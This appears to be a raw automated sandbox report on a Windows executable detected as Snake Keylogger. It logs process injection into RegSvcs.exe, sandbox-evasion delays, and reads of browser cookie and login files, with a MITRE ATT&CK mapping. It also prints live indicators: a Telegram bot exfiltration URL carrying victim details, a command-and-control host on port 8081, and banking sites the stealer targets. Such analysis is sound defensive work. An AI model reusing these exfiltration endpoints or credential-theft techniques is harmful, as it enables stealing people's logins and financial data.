                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 8138
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 1715
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596639Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596516Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596406Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595141Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594922Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594811Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594469Jump to behavior
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696508427t
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696508427s
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696508427f
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427x
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696508427t
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427}
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696508427}
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696508427t
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427x
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696508427o
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696508427u
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696508427j
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696508427x
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427}
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696508427}
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696508427h
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696508427s
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696508427j
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696508427x
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
                    Source: RegSvcs.exe, 00000002.00000002.4794609569.0000000000C36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSyst
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696508427h
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696508427f
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696508427]
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696508427u
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696508427d
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696508427o
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696508427x
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696508427x
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696508427]
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696508427t
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696508427d
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B9548 LdrInitializeThunk,2_2_061B9548
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe; Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 786008
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7DI4iYwcvw.exe"
                    Source: 7DI4iYwcvw.exe; Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match; File source: 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 7020, type: MEMORYSTR
                    Source: Yara match; File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 7020, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Yara match; File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 7020, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match; File source: 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 7020, type: MEMORYSTR
                    Source: Yara match; File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 7020, type: MEMORYSTR
                    MITRE ATT&CK Matrix, listed per tactic (numbers in parentheses are the per-technique counts from the matrix):
                    Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
                    Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
                    Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
                    Execution: Windows Management Instrumentation, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers
                    Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
                    Privilege Escalation: Process Injection (212), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
                    Defense Evasion: Disable or Modify Tools (1), Virtualization/Sandbox Evasion (11), Process Injection (212), Obfuscated Files or Information (2), DLL Side-Loading (1), Steganography, Compile After Delivery
                    Credential Access: OS Credential Dumping (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
                    Discovery: Security Software Discovery (11), Process Discovery (1), Virtualization/Sandbox Evasion (11), Application Window Discovery (1), System Network Configuration Discovery (1), File and Directory Discovery (1), System Information Discovery (113)
                    Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
                    Collection: Email Collection (1), Archive Collected Data (1), Data from Local System (1), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
                    Command and Control: Web Service (1), Encrypted Channel (11), Non-Standard Port (1), Ingress Tool Transfer (3), Non-Application Layer Protocol (3), Application Layer Protocol (24), Commonly Used Port
                    Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
                    Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery

                    Source | Detection | Scanner | Label | Link
                    7DI4iYwcvw.exe | 66% | ReversingLabs | Win32.Spyware.Snakekeylogger |
                    7DI4iYwcvw.exe | 100% | Avira | HEUR/AGEN.1321671 |
                    7DI4iYwcvw.exe | 100% | Joe Sandbox ML | |
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
                    https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
                    https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | URL Reputation | safe |
                    https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
                    https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
                    http://checkip.dyndns.org/ | 0% | URL Reputation | safe |
                    https://reallyfreegeoip.org/xml/8.46.123.33$ | 0% | URL Reputation | safe |
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
                    http://checkip.dyndns.org/q | 0% | URL Reputation | safe |
                    https://reallyfreegeoip.org | 0% | URL Reputation | safe |
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
                    https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe |
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    reallyfreegeoip.org | 188.114.96.3 | true | true | | unknown
                    api.telegram.org | 149.154.167.220 | true | true | | unknown
                    mail.irco.com.sa | 46.151.208.21 | true | true | | unknown
                    checkip.dyndns.com | 193.122.6.168 | true | false | | unknown
                    checkip.dyndns.org | unknown | unknown | true | | unknown
                    Name | Malicious | Antivirus Detection | Reputation
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2009/10/2024%20/%2023:08:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | unknown
                    https://reallyfreegeoip.org/xml/8.46.123.33 | false | URL Reputation: safe | unknown
                    http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | RegSvcs.exe, 00000002.00000002.4794997601.00000000029CF000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/chrome_newtab | RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org/bot | RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text= | RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://chrome.google.com/webstore?hl=en | RegSvcs.exe, 00000002.00000002.4794997601.000000000299E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.0000000002999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.00000000029CF000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://varders.kozow.com:8081 | RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20a | RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
